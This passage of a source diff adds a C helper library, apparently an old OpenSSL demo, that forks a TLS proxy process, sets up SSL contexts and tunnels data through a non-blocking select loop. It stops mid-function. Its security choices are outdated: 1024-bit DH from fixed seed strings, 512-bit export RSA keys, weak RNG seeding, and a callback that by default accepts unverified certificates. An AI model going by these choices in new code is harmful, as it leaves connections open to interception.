+
+/*****************************************************************************/
+
+#ifdef TLS_APP
+# include TLS_APP
+#endif
+
+/*-
+ * Applications can define:
+ *   TLS_APP_PROCESS_INIT -- void ...(int fd, int client_p, void *apparg)
+ *   TLS_CUMULATE_ERRORS
+ *   TLS_ERROR_BUFSIZ
+ *   TLS_APP_ERRFLUSH -- void ...(int child_p, char *, size_t, void *apparg)
+ */
+
+#ifndef TLS_APP_PROCESS_INIT
+# define TLS_APP_PROCESS_INIT(fd, client_p, apparg) ((void) 0)
+#endif
+
+#ifndef TLS_ERROR_BUFSIZ
+# define TLS_ERROR_BUFSIZ (10*160)
+#endif
+#if TLS_ERROR_BUFSIZ < 2        /* {'\n',0} */
+# error "TLS_ERROR_BUFSIZE is too small."
+#endif
+
+#ifndef TLS_APP_ERRFLUSH
+# define TLS_APP_ERRFLUSH tls_app_errflush
+static void
+tls_app_errflush(int child_p, char *errbuf, size_t num, void *apparg)
+{
+    fputs(errbuf, stderr);
+}
+#endif
+
+/*****************************************************************************/
+
+#ifdef DEBUG_TLS
+# define DEBUG_MSG(x) fprintf(stderr,"  %s\n",x)
+# define DEBUG_MSG2(x,y) fprintf(stderr, "  %s: %d\n",x,y)
+static int tls_loop_count = 0;
+static int tls_select_count = 0;
+#else
+# define DEBUG_MSG(x) (void)0
+# define DEBUG_MSG2(x,y) (void)0
+#endif
+
+static void tls_rand_seed_uniquely(void);
+static void tls_proxy(int clear_fd, int tls_fd, int info_fd, SSL_CTX *ctx,
+                      int client_p);
+static int tls_socket_nonblocking(int fd);
+
+static int tls_child_p = 0;
+static void *tls_child_apparg;
+
+struct tls_start_proxy_args tls_start_proxy_defaultargs(void)
+{
+    struct tls_start_proxy_args ret;
+
+    ret.fd = -1;
+    ret.client_p = -1;
+    ret.ctx = NULL;
+    ret.pid = NULL;
+    ret.infofd = NULL;
+
+    return ret;
+}
+
+/*-
+ * Slice in TLS proxy process at fd.
+ * Return value:
+ *   0    ok  (*pid is set to child's PID if pid != NULL),
+ *   < 0  look at errno
+ *   > 0  other error
+ *   (return value encodes place of error)
+ *
+ */
+int tls_start_proxy(struct tls_start_proxy_args a, void *apparg)
+{
+    int fds[2] = { -1, -1 };
+    int infofds[2] = { -1, -1 };
+    int r, getfd, getfl;
+    int ret;
+
+    DEBUG_MSG2("tls_start_proxy fd", a.fd);
+    DEBUG_MSG2("tls_start_proxy client_p", a.client_p);
+
+    if (a.fd == -1 || a.client_p == -1 || a.ctx == NULL)
+        return 1;
+
+    if (a.pid != NULL) {
+        *a.pid = 0;
+    }
+    if (a.infofd != NULL) {
+        *a.infofd = -1;
+    }
+
+    r = socketpair(AF_UNIX, SOCK_STREAM, 0, fds);
+    if (r == -1)
+        return -1;
+    if (a.fd >= FD_SETSIZE || fds[0] >= FD_SETSIZE) {
+        ret = 2;
+        goto err;
+    }
+    if (a.infofd != NULL) {
+        r = pipe(infofds);
+        if (r == -1) {
+            ret = -3;
+            goto err;
+        }
+    }
+
+    r = fork();
+    if (r == -1) {
+        ret = -4;
+        goto err;
+    }
+    if (r == 0) {
+        DEBUG_MSG("fork");
+        tls_child_p = 1;
+        tls_child_apparg = apparg;
+        close(fds[1]);
+        if (infofds[0] != -1)
+            close(infofds[0]);
+        TLS_APP_PROCESS_INIT(a.fd, a.client_p, apparg);
+        DEBUG_MSG("TLS_APP_PROCESS_INIT");
+        tls_proxy(fds[0], a.fd, infofds[1], a.ctx, a.client_p);
+        exit(0);
+    }
+    if (a.pid != NULL)
+        *a.pid = r;
+    if (infofds[1] != -1) {
+        close(infofds[1]);
+        infofds[1] = -1;
+    }
+    /* install fds[1] in place of fd: */
+    close(fds[0]);
+    fds[0] = -1;
+    getfd = fcntl(a.fd, F_GETFD);
+    getfl = fcntl(a.fd, F_GETFL);
+    r = dup2(fds[1], a.fd);
+    close(fds[1]);
+    fds[1] = -1;
+    if (r == -1) {
+        ret = -5;
+        goto err;
+    }
+    if (getfd != 1)
+        fcntl(a.fd, F_SETFD, getfd);
+    if (getfl & O_NONBLOCK)
+        (void)tls_socket_nonblocking(a.fd);
+    if (a.infofd != NULL)
+        *a.infofd = infofds[0];
+    return 0;
+
+ err:
+    if (fds[0] != -1)
+        close(fds[0]);
+    if (fds[1] != -1)
+        close(fds[1]);
+    if (infofds[0] != -1)
+        close(infofds[0]);
+    if (infofds[1] != -1)
+        close(infofds[1]);
+    return ret;
+}
+
+/*****************************************************************************/
+
+static char errbuf[TLS_ERROR_BUFSIZ];
+static size_t errbuf_i = 0;
+
+static void tls_errflush(void *apparg)
+{
+    if (errbuf_i == 0)
+        return;
+
+    assert(errbuf_i < sizeof errbuf);
+    assert(errbuf[errbuf_i] == 0);
+    if (errbuf_i == sizeof errbuf - 1) {
+        /* make sure we have a newline, even if string has been truncated */
+        errbuf[errbuf_i - 1] = '\n';
+    }
+
+    /*
+     * TLS_APP_ERRFLUSH may modify the string as needed, e.g. substitute
+     * other characters for \n for convenience
+     */
+    TLS_APP_ERRFLUSH(tls_child_p, errbuf, errbuf_i, apparg);
+
+    errbuf_i = 0;
+}
+
+static void tls_errprintf(int flush, void *apparg, const char *fmt, ...)
+{
+    va_list args;
+    int r;
+
+    if (errbuf_i < sizeof errbuf - 1) {
+        size_t n;
+
+        va_start(args, fmt);
+        n = (sizeof errbuf) - errbuf_i;
+        r = vsnprintf(errbuf + errbuf_i, n, fmt, args);
+        if (r >= n)
+            r = n - 1;
+        if (r >= 0) {
+            errbuf_i += r;
+        } else {
+            errbuf_i = sizeof errbuf - 1;
+            errbuf[errbuf_i] = '\0';
+        }
+        assert(errbuf_i < sizeof errbuf);
+        assert(errbuf[errbuf_i] == 0);
+    }
+#ifndef TLS_CUMULATE_ERRORS
+    tls_errflush(apparg);
+#else
+    if (flush)
+        tls_errflush(apparg);
+#endif
+}
+
+/*
+ * app_prefix.. are for additional information provided by caller. If OpenSSL
+ * error queue is empty, print default_text ("???" if NULL).
+ */
+static char *tls_openssl_errors(const char *app_prefix_1,
+                                const char *app_prefix_2,
+                                const char *default_text, void *apparg)
+{
+    static char reasons[255];
+    size_t reasons_i;
+    unsigned long err;
+    const char *file;
+    int line;
+    const char *data;
+    int flags;
+    char *errstring;
+    int printed_something = 0;
+
+    reasons_i = 0;
+
+    assert(app_prefix_1 != NULL);
+    assert(app_prefix_2 != NULL);
+
+    if (default_text == NULL)
+        default_text = "?" "?" "?";
+
+    while ((err = ERR_get_error_line_data(&file, &line, &data, &flags)) != 0) {
+        if (reasons_i < sizeof reasons) {
+            size_t n;
+            int r;
+
+            n = (sizeof reasons) - reasons_i;
+            r = snprintf(reasons + reasons_i, n, "%s%s",
+                         (reasons_i > 0 ? ", " : ""),
+                         ERR_reason_error_string(err));
+            if (r >= n)
+                r = n - 1;
+            if (r >= 0) {
+                reasons_i += r;
+            } else {
+                reasons_i = sizeof reasons;
+            }
+            assert(reasons_i <= sizeof reasons);
+        }
+
+        errstring = ERR_error_string(err, NULL);
+        assert(errstring != NULL);
+        tls_errprintf(0, apparg, "OpenSSL error%s%s: %s:%s:%d:%s\n",
+                      app_prefix_1, app_prefix_2, errstring, file, line,
+                      (flags & ERR_TXT_STRING) ? data : "");
+        printed_something = 1;
+    }
+
+    if (!printed_something) {
+        assert(reasons_i == 0);
+        snprintf(reasons, sizeof reasons, "%s", default_text);
+        tls_errprintf(0, apparg, "OpenSSL error%s%s: %s\n", app_prefix_1,
+                      app_prefix_2, default_text);
+    }
+#ifdef TLS_CUMULATE_ERRORS
+    tls_errflush(apparg);
+#endif
+    assert(errbuf_i == 0);
+
+    return reasons;
+}
+
+/*****************************************************************************/
+
+static int tls_init_done = 0;
+
+static int tls_init(void *apparg)
+{
+    if (tls_init_done)
+        return 0;
+
+    SSL_load_error_strings();
+    if (!SSL_library_init() /* aka SSLeay_add_ssl_algorithms() */ ) {
+        tls_errprintf(1, apparg, "SSL_library_init failed.\n");
+        return -1;
+    }
+    tls_init_done = 1;
+    tls_rand_seed();
+    return 0;
+}
+
+/*****************************************************************************/
+
+static void tls_rand_seed_uniquely(void)
+{
+    struct {
+        pid_t pid;
+        time_t time;
+        void *stack;
+    } data;
+
+    data.pid = getpid();
+    data.time = time(NULL);
+    data.stack = (void *)&data;
+
+    RAND_seed((const void *)&data, sizeof data);
+}
+
+void tls_rand_seed(void)
+{
+    struct {
+        struct utsname uname;
+        int uname_1;
+        int uname_2;
+        uid_t uid;
+        uid_t euid;
+        gid_t gid;
+        gid_t egid;
+    } data;
+
+    data.uname_1 = uname(&data.uname);
+    data.uname_2 = errno;       /* Let's hope that uname fails randomly :-) */
+
+    data.uid = getuid();
+    data.euid = geteuid();
+    data.gid = getgid();
+    data.egid = getegid();
+
+    RAND_seed((const void *)&data, sizeof data);
+    tls_rand_seed_uniquely();
+}
+
+static int tls_rand_seeded_p = 0;
+
+#define my_MIN_SEED_BYTES 256   /* struct stat can be larger than 128 */
+int tls_rand_seed_from_file(const char *filename, size_t n, void *apparg)
+{
+    /*
+     * Seed OpenSSL's random number generator from file. Try to read n bytes
+     * if n > 0, whole file if n == 0.
+     */
+
+    int r;
+
+    if (tls_init(apparg) == -1)
+        return -1;
+    tls_rand_seed();
+
+    r = RAND_load_file(filename,
+                       (n > 0 && n < LONG_MAX) ? (long)n : LONG_MAX);
+    /*
+     * r is the number of bytes filled into the random number generator,
+     * which are taken from "stat(filename, ...)" in addition to the file
+     * contents.
+     */
+    assert(1 < my_MIN_SEED_BYTES);
+    /*
+     * We need to detect at least those cases when the file does not exist at
+     * all.  With current versions of OpenSSL, this should do it:
+     */
+    if (n == 0)
+        n = my_MIN_SEED_BYTES;
+    if (r < n) {
+        tls_errprintf(1, apparg,
+                      "rand_seed_from_file: could not read %d bytes from %s.\n",
+                      n, filename);
+        return -1;
+    } else {
+        tls_rand_seeded_p = 1;
+        return 0;
+    }
+}
+
+void tls_rand_seed_from_memory(const void *buf, size_t n)
+{
+    size_t i = 0;
+
+    while (i < n) {
+        size_t rest = n - i;
+        int chunk = rest < INT_MAX ? (int)rest : INT_MAX;
+        RAND_seed((const char *)buf + i, chunk);
+        i += chunk;
+    }
+    tls_rand_seeded_p = 1;
+}
+
+/*****************************************************************************/
+
+struct tls_x509_name_string {
+    char str[100];
+};
+
+static void
+tls_get_x509_subject_name_oneline(X509 *cert,
+                                  struct tls_x509_name_string *namestring)
+{
+    X509_NAME *name;
+
+    if (cert == NULL) {
+        namestring->str[0] = '\0';
+        return;
+    }
+
+    name = X509_get_subject_name(cert); /* does not increment any reference
+                                         * counter */
+
+    assert(sizeof namestring->str >= 4); /* "?" or "...", plus 0 */
+
+    if (name == NULL) {
+        namestring->str[0] = '?';
+        namestring->str[1] = 0;
+    } else {
+        size_t len;
+
+        X509_NAME_oneline(name, namestring->str, sizeof namestring->str);
+        len = strlen(namestring->str);
+        assert(namestring->str[len] == 0);
+        assert(len < sizeof namestring->str);
+
+        if (len + 1 == sizeof namestring->str) {
+            /*
+             * (Probably something was cut off.) Does not really work --
+             * X509_NAME_oneline truncates after name components, we cannot
+             * tell from the result whether anything is missing.
+             */
+
+            assert(namestring->str[len] == 0);
+            namestring->str[--len] = '.';
+            namestring->str[--len] = '.';
+            namestring->str[--len] = '.';
+        }
+    }
+}
+
+/*****************************************************************************/
+
+/* to hinder OpenSSL from asking for passphrases */
+static int no_passphrase_callback(char *buf, int num, int w, void *arg)
+{
+    return -1;
+}
+
+#if OPENSSL_VERSION_NUMBER >= 0x00907000L
+static int verify_dont_fail_cb(X509_STORE_CTX *c, void *unused_arg)
+#else
+static int verify_dont_fail_cb(X509_STORE_CTX *c)
+#endif
+{
+    int i;
+
+    i = X509_verify_cert(c);    /* sets c->error */
+#if OPENSSL_VERSION_NUMBER >= 0x00905000L /* don't allow unverified
+                                           * certificates -- they could
+                                           * survive session reuse, but
+                                           * OpenSSL < 0.9.5-dev does not
+                                           * preserve their verify_result */
+    if (i == 0)
+        return 1;
+    else
+#endif
+        return i;
+}
+
+static DH *tls_dhe1024 = NULL;  /* generating these takes a while, so do it
+                                 * just once */
+
+void tls_set_dhe1024(int i, void *apparg)
+{
+    DSA *dsaparams;
+    DH *dhparams;
+    const char *seed[] = { ";-)  :-(  :-)  :-(  ",
+        ";-)  :-(  :-)  :-(  ",
+        "Random String no. 12",
+        ";-)  :-(  :-)  :-(  ",
+        "hackers have even mo", /* from jargon file */
+    };
+    unsigned char seedbuf[20];
+
+    tls_init(apparg);
+    if (i >= 0) {
+        i %= sizeof seed / sizeof seed[0];
+        assert(strlen(seed[i]) == 20);
+        memcpy(seedbuf, seed[i], 20);
+        dsaparams =
+            DSA_generate_parameters(1024, seedbuf, 20, NULL, NULL, 0, NULL);
+    } else {
+        /* random parameters (may take a while) */
+        dsaparams =
+            DSA_generate_parameters(1024, NULL, 0, NULL, NULL, 0, NULL);
+    }
+
+    if (dsaparams == NULL) {
+        tls_openssl_errors("", "", NULL, apparg);
+        return;
+    }
+    dhparams = DSA_dup_DH(dsaparams);
+    DSA_free(dsaparams);
+    if (dhparams == NULL) {
+        tls_openssl_errors("", "", NULL, apparg);
+        return;
+    }
+    if (tls_dhe1024 != NULL)
+        DH_free(tls_dhe1024);
+    tls_dhe1024 = dhparams;
+}
+
+struct tls_create_ctx_args tls_create_ctx_defaultargs(void)
+{
+    struct tls_create_ctx_args ret;
+
+    ret.client_p = 0;
+    ret.certificate_file = NULL;
+    ret.key_file = NULL;
+    ret.ca_file = NULL;
+    ret.verify_depth = -1;
+    ret.fail_unless_verified = 0;
+    ret.export_p = 0;
+
+    return ret;
+}
+
+SSL_CTX *tls_create_ctx(struct tls_create_ctx_args a, void *apparg)
+{
+    int r;
+    static long context_num = 0;
+    SSL_CTX *ret;
+    const char *err_pref_1 = "", *err_pref_2 = "";
+
+    if (tls_init(apparg) == -1)
+        return NULL;
+
+    ret =
+        SSL_CTX_new((a.client_p ? SSLv23_client_method :
+                     SSLv23_server_method) ());
+
+    if (ret == NULL)
+        goto err;
+
+    SSL_CTX_set_default_passwd_cb(ret, no_passphrase_callback);
+    SSL_CTX_set_mode(ret, SSL_MODE_ENABLE_PARTIAL_WRITE);
+
+    if ((a.certificate_file != NULL) || (a.key_file != NULL)) {
+        if (a.key_file == NULL) {
+            tls_errprintf(1, apparg, "Need a key file.\n");
+            goto err_return;
+        }
+        if (a.certificate_file == NULL) {
+            tls_errprintf(1, apparg, "Need a certificate chain file.\n");
+            goto err_return;
+        }
+
+        if (!SSL_CTX_use_PrivateKey_file(ret, a.key_file, SSL_FILETYPE_PEM))
+            goto err;
+        if (!tls_rand_seeded_p) {
+            /*
+             * particularly paranoid people may not like this -- so provide
+             * your own random seeding before calling this
+             */
+            if (tls_rand_seed_from_file(a.key_file, 0, apparg) == -1)
+                goto err_return;
+        }
+        if (!SSL_CTX_use_certificate_chain_file(ret, a.certificate_file))
+            goto err;
+        if (!SSL_CTX_check_private_key(ret)) {
+            tls_errprintf(1, apparg,
+                          "Private key \"%s\" does not match certificate \"%s\".\n",
+                          a.key_file, a.certificate_file);
+            goto err_peek;
+        }
+    }
+
+    if ((a.ca_file != NULL) || (a.verify_depth > 0)) {
+        context_num++;
+        r = SSL_CTX_set_session_id_context(ret, (const void *)&context_num,
+                                           (unsigned int)sizeof context_num);
+        if (!r)
+            goto err;
+
+        SSL_CTX_set_verify(ret,
+                           SSL_VERIFY_PEER | (a.fail_unless_verified ?
+                                              SSL_VERIFY_FAIL_IF_NO_PEER_CERT
+                                              : 0), 0);
+        if (!a.fail_unless_verified)
+            SSL_CTX_set_cert_verify_callback(ret, verify_dont_fail_cb, NULL);
+
+        if (a.verify_depth > 0)
+            SSL_CTX_set_verify_depth(ret, a.verify_depth);
+
+        if (a.ca_file != NULL) {
+            /* does not report failure if file does not exist ... */
+            /* NULL argument means no CA-directory */
+            r = SSL_CTX_load_verify_locations(ret, a.ca_file, NULL);
+            if (!r) {
+                err_pref_1 = " while processing certificate file ";
+                err_pref_2 = a.ca_file;
+                goto err;
+            }
+
+            if (!a.client_p) {
+                /*
+                 * SSL_load_client_CA_file is a misnomer, it just creates a
+                 * list of CNs.
+                 */
+                SSL_CTX_set_client_CA_list(ret,
+                                           SSL_load_client_CA_file
+                                           (a.ca_file));
+                /*
+                 * SSL_CTX_set_client_CA_list does not have a return value;
+                 * it does not really need one, but make sure (we really test
+                 * if SSL_load_client_CA_file worked)
+                 */
+                if (SSL_CTX_get_client_CA_list(ret) == NULL) {
+                    tls_errprintf(1, apparg,
+                                  "Could not set client CA list from \"%s\".\n",
+                                  a.ca_file);
+                    goto err_peek;
+                }
+            }
+        }
+    }
+
+    if (!a.client_p) {
+        if (tls_dhe1024 == NULL) {
+            int i;
+
+            RAND_bytes((unsigned char *)&i, sizeof i);
+            /*
+             * make sure that i is non-negative -- pick one of the provided
+             * seeds
+             */
+            if (i < 0)
+                i = -i;
+            if (i < 0)
+                i = 0;
+            tls_set_dhe1024(i, apparg);
+            if (tls_dhe1024 == NULL)
+                goto err_return;
+        }
+
+        if (!SSL_CTX_set_tmp_dh(ret, tls_dhe1024))
+            goto err;
+
+        /* avoid small subgroup attacks: */
+        SSL_CTX_set_options(ret, SSL_OP_SINGLE_DH_USE);
+    }
+#ifndef NO_RSA
+    if (!a.client_p && a.export_p) {
+        RSA *tmpkey;
+
+        tmpkey = RSA_generate_key(512, RSA_F4, 0, NULL);
+        if (tmpkey == NULL)
+            goto err;
+        if (!SSL_CTX_set_tmp_rsa(ret, tmpkey)) {
+            RSA_free(tmpkey);
+            goto err;
+        }
+        RSA_free(tmpkey);       /* SSL_CTX_set_tmp_rsa uses a duplicate. */
+    }
+#endif
+
+    return ret;
+
+ err_peek:
+    if (!ERR_peek_error())
+        goto err_return;
+ err:
+    tls_openssl_errors(err_pref_1, err_pref_2, NULL, apparg);
+ err_return:
+    if (ret != NULL)
+        SSL_CTX_free(ret);
+    return NULL;
+}
+
+/*****************************************************************************/
+
+static int tls_socket_nonblocking(int fd)
+{
+    int v, r;
+
+    v = fcntl(fd, F_GETFL, 0);
+    if (v == -1) {
+        if (errno == EINVAL)
+            return 0;           /* already shut down -- ignore */
+        return -1;
+    }
+    r = fcntl(fd, F_SETFL, v | O_NONBLOCK);
+    if (r == -1) {
+        if (errno == EINVAL)
+            return 0;           /* already shut down -- ignore */
+        return -1;
+    }
+    return 0;
+}
+
+static int max(int a, int b)
+{
+    return a > b ? a : b;
+}
+
+/* timeout, -1 means no timeout */
+static void
+tls_sockets_select(int read_select_1, int read_select_2, int write_select_1,
+                   int write_select_2, int seconds)
+{
+    int maxfd, n;
+    fd_set reads, writes;
+    struct timeval timeout;
+    struct timeval *timeout_p;
+
+    assert(read_select_1 >= -1 && read_select_2 >= -1 && write_select_1 >= -1
+           && write_select_2 >= -1);
+    assert(read_select_1 < FD_SETSIZE && read_select_2 < FD_SETSIZE - 1
+           && write_select_1 < FD_SETSIZE - 1
+           && write_select_2 < FD_SETSIZE - 1);
+
+    maxfd =
+        max(max(read_select_1, read_select_2),
+            max(write_select_1, write_select_2));
+    assert(maxfd >= 0);
+
+    FD_ZERO(&reads);
+    FD_ZERO(&writes);
+
+    for (n = 0; n < 4; ++n) {
+        int i = n % 2;
+        int w = n >= 2;
+        /* loop over all (i, w) in {0,1}x{0,1} */
+        int fd;
+
+        if (i == 0 && w == 0)
+            fd = read_select_1;
+        else if (i == 1 && w == 0)
+            fd = read_select_2;
+        else if (i == 0 && w == 1)
+            fd = write_select_1;
+        else {
+            assert(i == 1 && w == 1);
+            fd = write_select_2;
+        }
+
+        if (fd >= 0) {
+            if (w == 0)
+                FD_SET(fd, &reads);
+            else                /* w == 1 */
+                FD_SET(fd, &writes);
+        }
+    }
+
+    if (seconds >= 0) {
+        timeout.tv_sec = seconds;
+        timeout.tv_usec = 0;
+        timeout_p = &timeout;
+    } else
+        timeout_p = NULL;
+
+    DEBUG_MSG2("select no.", ++tls_select_count);
+    select(maxfd + 1, &reads, &writes, (fd_set *) NULL, timeout_p);
+    DEBUG_MSG("cont.");
+}
+
+/*****************************************************************************/
+
+#define TUNNELBUFSIZE (16*1024)
+struct tunnelbuf {
+    char buf[TUNNELBUFSIZE];
+    size_t len;
+    size_t offset;
+};
+
+static int tls_connect_attempt(SSL *, int *write_select, int *read_select,
+                               int *closed, int *progress,
+                               const char **err_pref);
+
+static int tls_accept_attempt(SSL *, int *write_select, int *read_select,
+                              int *closed, int *progress,
+                              const char **err_pref);
+
+static int tls_write_attempt(SSL *, struct tunnelbuf *, int *write_select,
+                             int *read_select, int *closed, int *progress,
+                             const char **err_pref);
+
+static int tls_read_attempt(SSL *, struct tunnelbuf *, int *write_select,
+                            int *read_select, int *closed, int *progress,
+                            const char **err_pref);
+
+static int write_attempt(int fd, struct tunnelbuf *, int *select, int *closed,
+                         int *progress);
+
+static int read_attempt(int fd, struct tunnelbuf *, int *select, int *closed,
+                        int *progress);
+
+static void write_info(SSL *ssl, int *info_fd)
+{
+    if (*info_fd != -1) {
+        long v;
+        int v_ok;
+        struct tls_x509_name_string peer;
+        char infobuf[TLS_INFO_SIZE];
+        int r;
+
+        DEBUG_MSG("write_info");
+        v = SSL_get_verify_result(ssl);
+        v_ok = (v == X509_V_OK) ? 'A' : 'E'; /* Auth./Error */
+        {
+            X509 *peercert;
+
+            peercert = SSL_get_peer_certificate(ssl);
+            tls_get_x509_subject_name_oneline(peercert, &peer);
+            if (peercert != NULL)
+                X509_free(peercert);
+        }
+        if (peer.str[0] == '\0')
+            v_ok = '0';         /* no cert at all */
+        else if (strchr(peer.str, '\n')) {
+            /* should not happen, but make sure */
+            *strchr(peer.str, '\n') = '\0';
+        }
+        r = snprintf(infobuf, sizeof infobuf, "%c:%s\n%s\n", v_ok,
+                     X509_verify_cert_error_string(v), peer.str);
+        DEBUG_MSG2("snprintf", r);
+        if (r == -1 || r >= sizeof infobuf)
+            r = sizeof infobuf - 1;
+        write(*info_fd, infobuf, r);
+        close(*info_fd);
+        *info_fd = -1;
+    }
+}
+
+/* tls_proxy expects that all fds are closed after return */
+static void
+tls_proxy(int clear_fd, int tls_fd, int info_fd, SSL_CTX *ctx, int client_p)
+{
+    struct tunnelbuf clear_to_tls, tls_to_clear;
+    SSL *ssl;
+    BIO *rbio, *wbio;
+    int closed, in_handshake;
+    const char *err_pref_1 = "", *err_pref_2 = "";
+    const char *err_def = NULL;
+
+    assert(clear_fd != -1);
+    assert(tls_fd != -1);
+    assert(clear_fd < FD_SETSIZE);
+    assert(tls_fd < FD_SETSIZE);
+    /* info_fd may be -1 */
+    assert(ctx != NULL);
+
+    tls_rand_seed_uniquely();
+
+    tls_socket_nonblocking(clear_fd);
+    DEBUG_MSG2("clear_fd", clear_fd);
+    tls_socket_nonblocking(tls_fd);
+    DEBUG_MSG2("tls_fd", tls_fd);
+
+    ssl = SSL_new(ctx);
+    if (ssl == NULL)
+        goto err;
+    DEBUG_MSG("SSL_new");
+    if (!SSL_set_fd(ssl, tls_fd))
+        goto err;
+    rbio = SSL_get_rbio(ssl);
+    wbio = SSL_get_wbio(ssl);   /* should be the same, but who cares */
+    assert(rbio != NULL);
+    assert(wbio != NULL);
+    if (client_p)
+        SSL_set_connect_state(ssl);
+    else
+        SSL_set_accept_state(ssl);
+
+    closed = 0;
+    in_handshake = 1;
+    tls_to_clear.len = 0;
+    tls_to_clear.offset = 0;
+    clear_to_tls.len = 0;
+    clear_to_tls.offset = 0;
+
+    err_def = "I/O error";
+
+    /*
+     * loop finishes as soon as we detect that one side closed; when all
+     * (program and OS) buffers have enough space, the data from the last
+     * succesful read in each direction is transferred before close
+     */
+    do {
+        int clear_read_select = 0, clear_write_select = 0,
+            tls_read_select = 0, tls_write_select = 0, progress = 0;
+        int r;
+        unsigned long num_read = BIO_number_read(rbio),
+            num_written = BIO_number_written(wbio);
+
+        DEBUG_MSG2("loop iteration", ++tls_loop_count);
+
+        if (in_handshake) {
+            DEBUG_MSG("in_handshake");
+            if (client_p)
+                r = tls_connect_attempt(ssl, &tls_write_select,
+                                        &tls_read_select, &closed, &progress,
+                                        &err_pref_1);
+            else
+                r = tls_accept_attempt(ssl, &tls_write_select,
+                                       &tls_read_select, &closed, &progress,
+                                       &err_pref_1);
+            if (r != 0) {
+                write_info(ssl, &info_fd);
+                goto err;
+            }
+            if (closed)
+                goto err_return;
+            if (!SSL_in_init(ssl)) {
+                in_handshake = 0;
+                write_info(ssl, &info_fd);
+            }
+        }
+
+        if (clear_to_tls.len != 0 && !in_handshake) {
+            assert(!closed);
+
+            r = tls_write_attempt(ssl, &clear_to_tls, &tls_write_select,
+                                  &tls_read_select, &closed, &progress,
+                                  &err_pref_1);
+            if (r != 0)
+                goto err;
+            if (closed) {
+                assert(progress);
+                tls_to_clear.offset = 0;
+                tls_to_clear.len = 0;
+            }
+        }
+
+        if (tls_to_clear.len != 0) {
+            assert(!closed);
+
+            r = write_attempt(clear_fd, &tls_to_clear, &clear_write_select,
+                              &closed, &progress);
+            if (r != 0)
+                goto err_return;
+            if (closed) {
+                assert(progress);
+                clear_to_tls.offset = 0;
+                clear_to_tls.len = 0;
+            }
+        }
+
+        if (!closed) {
+            if (clear_to_tls.offset + clear_to_tls.len <
+                sizeof clear_to_tls.buf) {
+                r = read_attempt(clear_fd, &clear_to_tls, &clear_read_select,
+                                 &closed, &progress);
+                if (r != 0)
+                    goto err_return;
+                if (closed) {
+                    r = SSL_shutdown(ssl);
+                    DEBUG_MSG2("SSL_shutdown", r);
+                }
+            }
+        }
+
+        if (!closed && !in_handshake) {
+            if (tls_to_clear.offset + tls_to_clear.len <
+                sizeof tls_to_clear.buf) {
+                r = tls_read_attempt(ssl, &tls_to_clear, &tls_write_select,
+                                     &tls_read_select, &closed, &progress,
+                                     &err_pref_1);
+                if (r != 0)
+                    goto err;
+                if (closed) {
+                    r = SSL_shutdown(ssl);
+                    DEBUG_MSG2("SSL_shutdown", r);
+                }
+            }
+        }
+
+        if (!progress) {
+            DEBUG_MSG("!progress?");
+            if (num_read != BIO_number_read(rbio)
+                || num_written != BIO_number_written(wbio))
+                progress = 1;
+
+            if (!progress) {
+                DEBUG_MSG("!progress");
+                assert(clear_read_select || tls_read_select
+                       || clear_write_select || tls_write_select);
+                tls_sockets_select(clear_read_select ? clear_fd : -1,
+                                   tls_read_select ? tls_fd : -1,
+                                   clear_write_select ? clear_fd : -1,
+                                   tls_write_select ? tls_fd : -1, -1);
+            }
+        }
+    } while (!closed);
+    return;
+
+ err:
+    tls_openssl_errors(err_pref_1, err_pref_2, err_def, tls_child_apparg);
+ err_return:
+    return;
+}
+
+static int
+tls_get_error(SSL *ssl, int r, int *write_select, int *read_select,
+              int *closed, int *progress)
+{
+    int err = SSL_get_error(ssl, r);
+
+    if (err == SSL_ERROR_NONE) {
+        assert(r > 0);
+        *progress = 1;
+        return 0;
+    }
+
+    assert(r <= 0);
+
+    switch (err) {
+    case SSL_ERROR_ZERO_RETURN:
+        assert(r == 0);
+        *closed = 1;
+        *progress = 1;
+        return 0;
+
+    case SSL_ERROR_WANT_WRITE:
+        *write_select = 1;
+        return 0;
+
+    case SSL_ERROR_WANT_READ:
+        *read_select = 1;
+        return 0;
+    }
+
+    return -1;
+}
+
+static int
+tls_connect_attempt(SSL *ssl, int *write_select, int *read_select,
+                    int *closed, int *progress, const char **err_pref)
+{
+    int n, r;
+
+    DEBUG_MSG("tls_connect_attempt");
+    n = SSL_connect(ssl);
+    DEBUG_MSG2("SSL_connect", n);
+    r = tls_get_error(ssl, n, write_select, read_select, closed, progress);
+    if (r == -1)
+        *err_pref = " during SSL_connect";
+    return r;
+}
+
+static int
+tls_accept_attempt(SSL *ssl, int *write_select, int *read_select, int *closed,
+                   int *progress, const char **err_pref)
+{
+    int n, r;
+
+    DEBUG_MSG("tls_accept_attempt");
+    n = SSL_accept(ssl);
+    DEBUG_MSG2("SSL_accept", n);
+    r = tls_get_error(ssl, n, write_select, read_select, closed, progress);
+    if (r == -1)
+        *err_pref = " during SSL_accept";
+    return r;
+}
+
+static int
+tls_write_attempt(SSL *ssl, struct tunnelbuf *buf, int *write_select,
+                  int *read_select, int *closed, int *progress,
+                  const char **err_pref)
+{
+    int n, r;
+
+    DEBUG_MSG("tls_write_attempt");
+    n = SSL_write(ssl, buf->buf + buf->offset, buf->len);
+    DEBUG_MSG2("SSL_write", n);
+    r = tls_get_error(ssl, n, write_select, read_select, closed, progress);
+    if (n > 0) {
+        buf->len -= n;
+        assert(buf->len >= 0);
+        if (buf->len == 0)
+            buf->offset = 0;
+        else
+            buf->offset += n;
+    }
+    if (r == -1)
+        *err_pref = " during SSL_write";
+    return r;
+}
+
+static int
+tls_read_attempt(SSL *ssl, struct tunnelbuf *buf, int *write_select,
+                 int *read_select, int *closed, int *progress,
+                 const char **err_pref)
+{
+    int n, r;
+    size_t total;
+
+    DEBUG_MSG("tls_read_attempt");
+    total = buf->offset + buf->len;
+    assert(total < sizeof buf->buf);
+    n = SSL_read(ssl, buf->buf + total, (sizeof buf->buf) - total);
+    DEBUG_MSG2("SSL_read", n);
+    r = tls_get_error(ssl, n, write_select, read_select, closed, progress);
+    if (n > 0) {
+        buf->len += n;
+        assert(buf->offset + buf->len <= sizeof buf->buf);
+    }
+    if (r == -1)
+        *err_pref = " during SSL_read";
+    return r;
+}
+
+static int get_error(int r, int *select, int *closed, int *progress)
+{
+    if (r >= 0) {
+        *progress = 1;
+        if (r == 0)
+            *closed = 1;
+        return 0;
+    } else {
+        assert(r == -1);
+        if (errno == EAGAIN || errno == EWOULDBLOCK) {
+            *select = 1;
+            return 0;
+        } else if (errno == EPIPE) {
+            *progress = 1;
+            *closed = 1;
+            return 0;
+        } else
+            return -1;
+    }
+}
+
+static int write_attempt(int fd, struct tunnelbuf *buf, int *select,
+                         int *closed, int *progress)
